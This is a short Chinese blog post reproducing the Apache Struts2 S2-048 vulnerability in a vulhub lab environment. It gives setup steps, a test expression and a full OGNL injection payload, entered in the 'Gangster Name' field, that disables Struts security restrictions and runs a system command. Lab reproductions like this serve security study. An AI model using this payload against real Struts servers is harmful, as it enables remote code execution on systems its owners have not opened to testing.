Struts2反序列化漏洞复现

环境: vulhub

环境搭建

进入s2-048目录

Struts2反序列化漏洞复现

 切换root用户

Struts2反序列化漏洞复现

 启动Struts2反序列化漏洞复现

漏洞复现

 浏览器访问 showcase

Struts2反序列化漏洞复现

 Struts2反序列化漏洞复现

 

Gangster Name输入 ${233*233} , 其余随便填

Struts2反序列化漏洞复现

 Struts2反序列化漏洞复现

 

将Gangster Name输入一下payload , 其余随便填

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())).(#q)} 
Struts2反序列化漏洞复现

 Struts2反序列化漏洞复现

 

版权声明:玥玥 发表于 2021-07-23 1:56:36。
转载请注明:Struts2反序列化漏洞复现 | 女黑客导航